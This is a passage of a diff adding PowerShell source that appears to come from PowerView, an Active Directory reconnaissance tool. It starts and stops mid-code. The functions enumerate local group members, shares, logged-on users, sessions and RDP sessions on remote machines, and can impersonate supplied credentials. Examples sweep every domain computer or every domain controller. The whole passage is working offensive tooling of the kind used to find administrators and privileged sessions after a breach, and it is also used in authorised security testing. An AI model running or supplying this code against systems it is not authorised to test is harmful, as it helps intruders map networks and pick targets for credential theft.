= $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = $Env:COMPUTERNAME, + + [ValidateSet('API', 'WinNT')] + [Alias('CollectionMethod')] + [String] + $Method = 'API', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + if ($Method -eq 'API') { + # if we're using the Netapi32 NetLocalGroupEnum API call to get the local group information + + # arguments for NetLocalGroupEnum + $QueryLevel = 1 + $PtrInfo = [IntPtr]::Zero + $EntriesRead = 0 + $TotalRead = 0 + $ResumeHandle = 0 + + # get the local user information + $Result = $Netapi32::NetLocalGroupEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) + + # locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { + + # Work out how much to increment the pointer by finding out the size of the structure + $Increment = $LOCALGROUP_INFO_1::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $EntriesRead); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $LOCALGROUP_INFO_1 + + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + + $LocalGroup = New-Object PSObject + $LocalGroup | Add-Member Noteproperty 'ComputerName' $Computer + $LocalGroup | Add-Member Noteproperty 'GroupName' $Info.lgrpi1_name + $LocalGroup | Add-Member Noteproperty 'Comment' $Info.lgrpi1_comment + $LocalGroup.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.API') + $LocalGroup + } + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + } + else { + Write-Verbose "[Get-NetLocalGroup] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + } + } + else { + # otherwise we're using the WinNT service provider + $ComputerProvider = [ADSI]"WinNT://$Computer,computer" + + $ComputerProvider.psbase.children | Where-Object { $_.psbase.schemaClassName -eq 'group' } | ForEach-Object { + $LocalGroup = ([ADSI]$_) + $Group = New-Object PSObject + $Group | Add-Member Noteproperty 'ComputerName' $Computer + $Group | Add-Member Noteproperty 'GroupName' ($LocalGroup.InvokeGet('Name')) + $Group | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalGroup.InvokeGet('objectsid'),0)).Value) + $Group | Add-Member Noteproperty 'Comment' ($LocalGroup.InvokeGet('Description')) + $Group.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroup.WinNT') + $Group + } + } + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-NetLocalGroupMember { +<# +.SYNOPSIS + +Enumerates members of a specific local group on the local (or remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Convert-ADName + +.DESCRIPTION + +This function will enumerate the members of a specified local group on the +current, or remote, machine. By default, the Win32 API call NetLocalGroupGetMembers +will be used (for speed). Specifying "-Method WinNT" causes the WinNT service provider +to be used instead, which returns a larger amount of information. + +.PARAMETER ComputerName + +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to the localhost. + +.PARAMETER GroupName + +The local group name to query for users. If not given, it defaults to "Administrators". + +.PARAMETER Method + +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to a remote machine. Only applicable with "-Method WinNT". + +.EXAMPLE + +Get-NetLocalGroupMember | ft + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... False False +WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False +WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True +WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True + +.EXAMPLE + +Get-NetLocalGroupMember -Method winnt | ft + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... False False +WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False +WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True +WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True + +.EXAMPLE + +Get-NetLocalGroup | Get-NetLocalGroupMember | ft + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +WINDOWS1 Administrators WINDOWS1\Ad... S-1-5-21-25... False False +WINDOWS1 Administrators WINDOWS1\lo... S-1-5-21-25... False False +WINDOWS1 Administrators TESTLAB\Dom... S-1-5-21-89... True True +WINDOWS1 Administrators TESTLAB\har... S-1-5-21-89... False True +WINDOWS1 Guests WINDOWS1\Guest S-1-5-21-25... False False +WINDOWS1 IIS_IUSRS NT AUTHORIT... S-1-5-17 False False +WINDOWS1 Users NT AUTHORIT... S-1-5-4 False False +WINDOWS1 Users NT AUTHORIT... S-1-5-11 False False +WINDOWS1 Users WINDOWS1\lo... S-1-5-21-25... False UNKNOWN +WINDOWS1 Users TESTLAB\Dom... S-1-5-21-89... True UNKNOWN + +.EXAMPLE + +Get-NetLocalGroupMember -ComputerName primary.testlab.local | ft + +ComputerName GroupName MemberName SID IsGroup IsDomain +------------ --------- ---------- --- ------- -------- +primary.tes... Administrators TESTLAB\Adm... S-1-5-21-89... False False +primary.tes... Administrators TESTLAB\loc... S-1-5-21-89... False False +primary.tes... Administrators TESTLAB\Ent... S-1-5-21-89... True False +primary.tes... Administrators TESTLAB\Dom... S-1-5-21-89... True False + +.OUTPUTS + +PowerView.LocalGroupMember.API + +Custom PSObject with translated group property fields from API results. + +PowerView.LocalGroupMember.WinNT + +Custom PSObject with translated group property fields from WinNT results. + +.LINK + +http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together +http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx +https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LocalGroupMember.API')] + [OutputType('PowerView.LocalGroupMember.WinNT')] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = $Env:COMPUTERNAME, + + [Parameter(ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [String] + $GroupName = 'Administrators', + + [ValidateSet('API', 'WinNT')] + [Alias('CollectionMethod')] + [String] + $Method = 'API', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + if ($Method -eq 'API') { + # if we're using the Netapi32 NetLocalGroupGetMembers API call to get the local group information + + # arguments for NetLocalGroupGetMembers + $QueryLevel = 2 + $PtrInfo = [IntPtr]::Zero + $EntriesRead = 0 + $TotalRead = 0 + $ResumeHandle = 0 + + # get the local user information + $Result = $Netapi32::NetLocalGroupGetMembers($Computer, $GroupName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) + + # locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + $Members = @() + + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { + + # Work out how much to increment the pointer by finding out the size of the structure + $Increment = $LOCALGROUP_MEMBERS_INFO_2::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $EntriesRead); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $LOCALGROUP_MEMBERS_INFO_2 + + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + + $SidString = '' + $Result2 = $Advapi32::ConvertSidToStringSid($Info.lgrmi2_sid, [ref]$SidString);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + if ($Result2 -eq 0) { + Write-Verbose "[Get-NetLocalGroupMember] Error: $(([ComponentModel.Win32Exception] $LastError).Message)" + } + else { + $Member = New-Object PSObject + $Member | Add-Member Noteproperty 'ComputerName' $Computer + $Member | Add-Member Noteproperty 'GroupName' $GroupName + $Member | Add-Member Noteproperty 'MemberName' $Info.lgrmi2_domainandname + $Member | Add-Member Noteproperty 'SID' $SidString + $IsGroup = $($Info.lgrmi2_sidusage -eq 'SidTypeGroup') + $Member | Add-Member Noteproperty 'IsGroup' $IsGroup + $Member.PSObject.TypeNames.Insert(0, 'PowerView.LocalGroupMember.API') + $Members += $Member + } + } + + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + + # try to extract out the machine SID by using the -500 account as a reference + $MachineSid = $Members | Where-Object {$_.SID -match '.*-500' -or ($_.SID -match '.*-501')} | Select-Object -Expand SID + if ($MachineSid) { + $MachineSid = $MachineSid.Substring(0, $MachineSid.LastIndexOf('-')) + + $Members | ForEach-Object { + if ($_.SID -match $MachineSid) { + $_ | Add-Member Noteproperty 'IsDomain' $False + } + else { + $_ | Add-Member Noteproperty 'IsDomain' $True + } + } + } + else { + $Members | ForEach-Object { + if ($_.SID -notmatch 'S-1-5-21') { + $_ | Add-Member Noteproperty 'IsDomain' $False + } + else { + $_ | Add-Member Noteproperty 'IsDomain' 'UNKNOWN' + } + } + } + $Members + } + else { + Write-Verbose "[Get-NetLocalGroupMember] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + } + } + else { + # otherwise we're using the WinNT service provider + try { + $GroupProvider = [ADSI]"WinNT://$Computer/$GroupName,group" + + $GroupProvider.psbase.Invoke('Members') | ForEach-Object { + + $Member = New-Object PSObject + $Member | Add-Member Noteproperty 'ComputerName' $Computer + $Member | Add-Member Noteproperty 'GroupName' $GroupName + + $LocalUser = ([ADSI]$_) + $AdsPath = $LocalUser.InvokeGet('AdsPath').Replace('WinNT://', '') + $IsGroup = ($LocalUser.SchemaClassName -like 'group') + + if(([regex]::Matches($AdsPath, '/')).count -eq 1) { + # DOMAIN\user + $MemberIsDomain = $True + $Name = $AdsPath.Replace('/', '\') + } + else { + # DOMAIN\machine\user + $MemberIsDomain = $False + $Name = $AdsPath.Substring($AdsPath.IndexOf('/')+1).Replace('/', '\') + } + + $Member | Add-Member Noteproperty 'AccountName' $Name + $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value) + $Member | Add-Member Noteproperty 'IsGroup' $IsGroup + $Member | Add-Member Noteproperty 'IsDomain' $MemberIsDomain + + # if ($MemberIsDomain) { + # # translate the binary sid to a string + # $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value) + # $Member | Add-Member Noteproperty 'Description' '' + # $Member | Add-Member Noteproperty 'Disabled' '' + + # if ($IsGroup) { + # $Member | Add-Member Noteproperty 'LastLogin' '' + # } + # else { + # try { + # $Member | Add-Member Noteproperty 'LastLogin' $LocalUser.InvokeGet('LastLogin') + # } + # catch { + # $Member | Add-Member Noteproperty 'LastLogin' '' + # } + # } + # $Member | Add-Member Noteproperty 'PwdLastSet' '' + # $Member | Add-Member Noteproperty 'PwdExpired' '' + # $Member | Add-Member Noteproperty 'UserFlags' '' + # } + # else { + # # translate the binary sid to a string + # $Member | Add-Member Noteproperty 'SID' ((New-Object System.Security.Principal.SecurityIdentifier($LocalUser.InvokeGet('ObjectSID'),0)).Value) + # $Member | Add-Member Noteproperty 'Description' ($LocalUser.Description) + + # if ($IsGroup) { + # $Member | Add-Member Noteproperty 'PwdLastSet' '' + # $Member | Add-Member Noteproperty 'PwdExpired' '' + # $Member | Add-Member Noteproperty 'UserFlags' '' + # $Member | Add-Member Noteproperty 'Disabled' '' + # $Member | Add-Member Noteproperty 'LastLogin' '' + # } + # else { + # $Member | Add-Member Noteproperty 'PwdLastSet' ( (Get-Date).AddSeconds(-$LocalUser.PasswordAge[0])) + # $Member | Add-Member Noteproperty 'PwdExpired' ( $LocalUser.PasswordExpired[0] -eq '1') + # $Member | Add-Member Noteproperty 'UserFlags' ( $LocalUser.UserFlags[0] ) + # # UAC flags of 0x2 mean the account is disabled + # $Member | Add-Member Noteproperty 'Disabled' $(($LocalUser.UserFlags.value -band 2) -eq 2) + # try { + # $Member | Add-Member Noteproperty 'LastLogin' ( $LocalUser.LastLogin[0]) + # } + # catch { + # $Member | Add-Member Noteproperty 'LastLogin' '' + # } + # } + # } + + $Member + } + } + catch { + Write-Verbose "[Get-NetLocalGroupMember] Error for $Computer : $_" + } + } + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-NetShare { +<# +.SYNOPSIS + +Returns open shares on the local (or a remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +.DESCRIPTION + +This function will execute the NetShareEnum Win32API call to query +a given host for open shares. This is a replacement for "net share \\hostname". + +.PARAMETER ComputerName + +Specifies the hostname to query for shares (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Get-NetShare + +Returns active shares on the local host. + +.EXAMPLE + +Get-NetShare -ComputerName sqlserver + +Returns active shares on the 'sqlserver' host + +.EXAMPLE + +Get-DomainComputer | Get-NetShare + +Returns all shares for all computers in the domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetShare -ComputerName sqlserver -Credential $Cred + +.OUTPUTS + +PowerView.ShareInfo + +A PSCustomObject representing a SHARE_INFO_1 structure, including +the name/type/remark for each share, with the ComputerName added. + +.LINK + +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ +#> + + [OutputType('PowerView.ShareInfo')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + # arguments for NetShareEnum + $QueryLevel = 1 + $PtrInfo = [IntPtr]::Zero + $EntriesRead = 0 + $TotalRead = 0 + $ResumeHandle = 0 + + # get the raw share information + $Result = $Netapi32::NetShareEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) + + # locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { + + # work out how much to increment the pointer by finding out the size of the structure + $Increment = $SHARE_INFO_1::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $EntriesRead); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $SHARE_INFO_1 + + # return all the sections of the structure - have to do it this way for V2 + $Share = $Info | Select-Object * + $Share | Add-Member Noteproperty 'ComputerName' $Computer + $Share.PSObject.TypeNames.Insert(0, 'PowerView.ShareInfo') + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + $Share + } + + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + } + else { + Write-Verbose "[Get-NetShare] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + } + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-NetLoggedon { +<# +.SYNOPSIS + +Returns users logged on the local (or a remote) machine. +Note: administrative rights needed for newer Windows OSes. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +.DESCRIPTION + +This function will execute the NetWkstaUserEnum Win32API call to query +a given host for actively logged on users. + +.PARAMETER ComputerName + +Specifies the hostname to query for logged on users (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Get-NetLoggedon + +Returns users actively logged onto the local host. + +.EXAMPLE + +Get-NetLoggedon -ComputerName sqlserver + +Returns users actively logged onto the 'sqlserver' host. + +.EXAMPLE + +Get-DomainComputer | Get-NetLoggedon + +Returns all logged on users for all computers in the domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetLoggedon -ComputerName sqlserver -Credential $Cred + +.OUTPUTS + +PowerView.LoggedOnUserInfo + +A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including +the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added. + +.LINK + +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ +#> + + [OutputType('PowerView.LoggedOnUserInfo')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + # declare the reference variables + $QueryLevel = 1 + $PtrInfo = [IntPtr]::Zero + $EntriesRead = 0 + $TotalRead = 0 + $ResumeHandle = 0 + + # get logged on user information + $Result = $Netapi32::NetWkstaUserEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) + + # locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { + + # work out how much to increment the pointer by finding out the size of the structure + $Increment = $WKSTA_USER_INFO_1::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $EntriesRead); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $WKSTA_USER_INFO_1 + + # return all the sections of the structure - have to do it this way for V2 + $LoggedOn = $Info | Select-Object * + $LoggedOn | Add-Member Noteproperty 'ComputerName' $Computer + $LoggedOn.PSObject.TypeNames.Insert(0, 'PowerView.LoggedOnUserInfo') + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + $LoggedOn + } + + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + } + else { + Write-Verbose "[Get-NetLoggedon] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + } + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-NetSession { +<# +.SYNOPSIS + +Returns session information for the local (or a remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +.DESCRIPTION + +This function will execute the NetSessionEnum Win32API call to query +a given host for active sessions. + +.PARAMETER ComputerName + +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Get-NetSession + +Returns active sessions on the local host. + +.EXAMPLE + +Get-NetSession -ComputerName sqlserver + +Returns active sessions on the 'sqlserver' host. + +.EXAMPLE + +Get-DomainController | Get-NetSession + +Returns active sessions on all domain controllers. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetSession -ComputerName sqlserver -Credential $Cred + +.OUTPUTS + +PowerView.SessionInfo + +A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including +the CName/UserName/Time/IdleTime for each session, with the ComputerName added. + +.LINK + +http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/ +#> + + [OutputType('PowerView.SessionInfo')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + # arguments for NetSessionEnum + $QueryLevel = 10 + $PtrInfo = [IntPtr]::Zero + $EntriesRead = 0 + $TotalRead = 0 + $ResumeHandle = 0 + + # get session information + $Result = $Netapi32::NetSessionEnum($Computer, '', $UserName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle) + + # locate the offset of the initial intPtr + $Offset = $PtrInfo.ToInt64() + + # 0 = success + if (($Result -eq 0) -and ($Offset -gt 0)) { + + # work out how much to increment the pointer by finding out the size of the structure + $Increment = $SESSION_INFO_10::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $EntriesRead); $i++) { + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as $SESSION_INFO_10 + + # return all the sections of the structure - have to do it this way for V2 + $Session = $Info | Select-Object * + $Session | Add-Member Noteproperty 'ComputerName' $Computer + $Session.PSObject.TypeNames.Insert(0, 'PowerView.SessionInfo') + $Offset = $NewIntPtr.ToInt64() + $Offset += $Increment + $Session + } + + # free up the result buffer + $Null = $Netapi32::NetApiBufferFree($PtrInfo) + } + else { + Write-Verbose "[Get-NetSession] Error: $(([ComponentModel.Win32Exception] $Result).Message)" + } + } + } + + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-RegLoggedOn { +<# +.SYNOPSIS + +Returns who is logged onto the local (or a remote) machine +through enumeration of remote registry keys. + +Note: This function requires only domain user rights on the +machine you're enumerating, but remote registry must be enabled. + +Author: Matt Kelly (@BreakersAll) +License: BSD 3-Clause +Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID + +.DESCRIPTION + +This function will query the HKU registry values to retrieve the local +logged on users SID and then attempt and reverse it. +Adapted technique from Sysinternal's PSLoggedOn script. Benefit over +using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges +required (NetWkstaUserEnum requires remote admin access). + +.PARAMETER ComputerName + +Specifies the hostname to query for remote registry values (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Get-RegLoggedOn + +Returns users actively logged onto the local host. + +.EXAMPLE + +Get-RegLoggedOn -ComputerName sqlserver + +Returns users actively logged onto the 'sqlserver' host. + +.EXAMPLE + +Get-DomainController | Get-RegLoggedOn + +Returns users actively logged on all domain controllers. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred + +.OUTPUTS + +PowerView.RegLoggedOnUser + +A PSCustomObject including the UserDomain/UserName/UserSID of each +actively logged on user, with the ComputerName added. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.RegLoggedOnUser')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost' + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + try { + # retrieve HKU remote registry values + $Reg = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey('Users', "$ComputerName") + + # sort out bogus sid's like _class + $Reg.GetSubKeyNames() | Where-Object { $_ -match 'S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+$' } | ForEach-Object { + $UserName = ConvertFrom-SID -ObjectSID $_ -OutputType 'DomainSimple' + + if ($UserName) { + $UserName, $UserDomain = $UserName.Split('@') + } + else { + $UserName = $_ + $UserDomain = $Null + } + + $RegLoggedOnUser = New-Object PSObject + $RegLoggedOnUser | Add-Member Noteproperty 'ComputerName' "$ComputerName" + $RegLoggedOnUser | Add-Member Noteproperty 'UserDomain' $UserDomain + $RegLoggedOnUser | Add-Member Noteproperty 'UserName' $UserName + $RegLoggedOnUser | Add-Member Noteproperty 'UserSID' $_ + $RegLoggedOnUser.PSObject.TypeNames.Insert(0, 'PowerView.RegLoggedOnUser') + $RegLoggedOnUser + } + } + catch { + Write-Verbose "[Get-RegLoggedOn] Error opening remote registry on '$ComputerName' : $_" + } + } + } + + END { + if ($LogonToken) { + Invoke-RevertToSelf -TokenHandle $LogonToken + } + } +} + + +function Get-NetRDPSession { +<# +.SYNOPSIS + +Returns remote desktop/session information for the local (or a remote) machine. + +Note: only members of the Administrators or Account Operators local group +can successfully execute this functionality on a remote target. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +.DESCRIPTION + +This function will execute the WTSEnumerateSessionsEx and WTSQuerySessionInformation +Win32API calls to query a given RDP remote service for active sessions and originating +IPs. This is a replacement for qwinsta. + +.PARAMETER ComputerName + +Specifies the hostname to query for active sessions (also accepts IP addresses). +Defaults to 'localhost'. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. + +.EXAMPLE + +Get-NetRDPSession + +Returns active RDP/terminal sessions on the local host. + +.EXAMPLE + +Get-NetRDPSession -ComputerName "sqlserver" + +Returns active RDP/terminal sessions on the 'sqlserver' host. + +.EXAMPLE + +Get-DomainController | Get-NetRDPSession + +Returns active RDP/terminal sessions on all domain controllers. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetRDPSession -ComputerName sqlserver -Credential $Cred + +.OUTPUTS + +PowerView.RDPSessionInfo + +A PSCustomObject representing a combined WTS_SESSION_INFO_1 and WTS_CLIENT_ADDRESS structure, +with the ComputerName added. + +.LINK + +https://msdn.microsoft.com/en-us/library/aa383861(v=vs.85).aspx +#> + + [OutputType('PowerView.RDPSessionInfo')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('HostName', 'dnshostname', 'name')] + [ValidateNotNullOrEmpty()] + [String[]] + $ComputerName = 'localhost', + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + if ($PSBoundParameters['Credential']) { + $LogonToken = Invoke-UserImpersonation -Credential $Credential + } + } + + PROCESS { + ForEach ($Computer in $ComputerName) { + + # open up a handle to the Remote Desktop Session host + $Handle = $Wtsapi32::WTSOpenServerEx($Computer) + + # if we get a non-zero handle back, everything was successful + if ($Handle -ne 0) { + + # arguments for WTSEnumerateSessionsEx + $ppSessionInfo = [IntPtr]::Zero + $pCount = 0 + + # get information on all current sessions + $Result = $Wtsapi32::WTSEnumerateSessionsEx($Handle, [ref]1, 0, [ref]$ppSessionInfo, [ref]$pCount);$LastError = [Runtime.InteropServices.Marshal]::GetLastWin32Error() + + # locate the offset of the initial intPtr + $Offset = $ppSessionInfo.ToInt64() + + if (($Result -ne 0) -and ($Offset -gt 0)) { + + # work out how much to increment the pointer by finding out the size of the structure + $Increment = $WTS_SESSION_INFO_1::GetSize() + + # parse all the result structures + for ($i = 0; ($i -lt $pCount); $i++) { + + # create a new int ptr at the given offset and cast the pointer as our result structure + $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset + $Info = $NewIntPtr -as 